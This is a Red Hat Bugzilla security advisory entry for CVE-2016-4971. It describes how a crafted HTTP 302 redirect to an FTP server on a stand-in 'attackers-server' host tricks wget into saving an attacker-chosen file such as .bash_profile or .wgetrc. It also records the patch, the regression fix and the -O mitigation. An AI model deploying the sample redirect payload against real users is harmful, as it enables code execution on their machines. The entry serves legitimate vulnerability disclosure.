Bug 1343666 - (CVE-2016-4971) CVE-2016-4971 wget: Lack of filename checking allows arbitrary file upload via FTP redirect
CVE-2016-4971 wget: Lack of filename checking allows arbitrary file upload vi...
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
impact=moderate,public=20160609,repor...
: Security
Depends On: 1345778
Blocks: 1323912 1343668
  Show dependency treegraph
 
Reported: 2016-06-07 11:55 EDT by Adam Mariš
Modified: 2017-03-09 19:47 EST (History)
7 users (show)

See Also:
Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)
Proposed upstream patch (12.04 KB, patch)
2016-06-07 11:56 EDT, Adam Mariš
no flags Details | Diff

  None (edit)
Description Adam Mariš 2016-06-07 11:55:19 EDT
GNU Wget (including the latest version) when supplied with a malicious website link can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename under the current directory. This can lead to potential code execution by creating system scripts (such as .bash_profile and others) within home directory as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading .wgetrc configuration file.

Because of lack of sufficient controls in wget, when user downloads a file with wget, such as:

wget http://attackers-server/safe_file.txt

An attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X Redirect containing ftp server reference in response to the victim's wget request. 

For example, if the attacker's server replies with the following response:

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache

wget will automatically follow the redirect and will download a malicious .bash_profile file from a malicious FTP server. It will fail to rename the file to the originally requested filename of 'safe_file.txt' as it would normally do, in case of a redirect to another HTTP resource with a different name.

Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory.
Comment 1 Adam Mariš 2016-06-07 11:55:24 EDT
Acknowledgments:

Name: GNU wget project
Upstream: Dawid Golunski
Comment 2 Adam Mariš 2016-06-07 11:56 EDT
Created attachment 1165694 [details]
Proposed upstream patch
Comment 4 Giuseppe Scrivano 2016-06-09 12:37:54 EDT
I've just released wget 1.18 with the fix:

ftp://ftp.gnu.org/gnu/wget/wget-1.18.tar.xz

I am going to publicly announce the new version in few hours
Comment 6 Dhiru Kholia 2016-06-14 04:09:42 EDT
Public via https://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
Comment 7 Adam Mariš 2016-06-23 06:15:19 EDT
CVE patch made a regression, this one fixes it:

http://git.savannah.gnu.org/cgit/wget.git/commit/?id=59b920874daa565a1323ffa1e756e80493190686
Comment 8 Dhiru Kholia 2016-07-08 05:31:10 EDT
Mitigation:

Use wget with "-O" option to explicitly specify the output filename.
Comment 10 Andrej Nemec 2016-07-11 03:21:18 EDT
References:

http://seclists.org/oss-sec/2016/q3/34
Comment 11 errata-xmlrpc 2016-11-03 16:18:24 EDT
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2016:2587 https://rhn.redhat.com/errata/RHSA-2016-2587.html

Note You need to log in before you can comment on or make changes to this bug.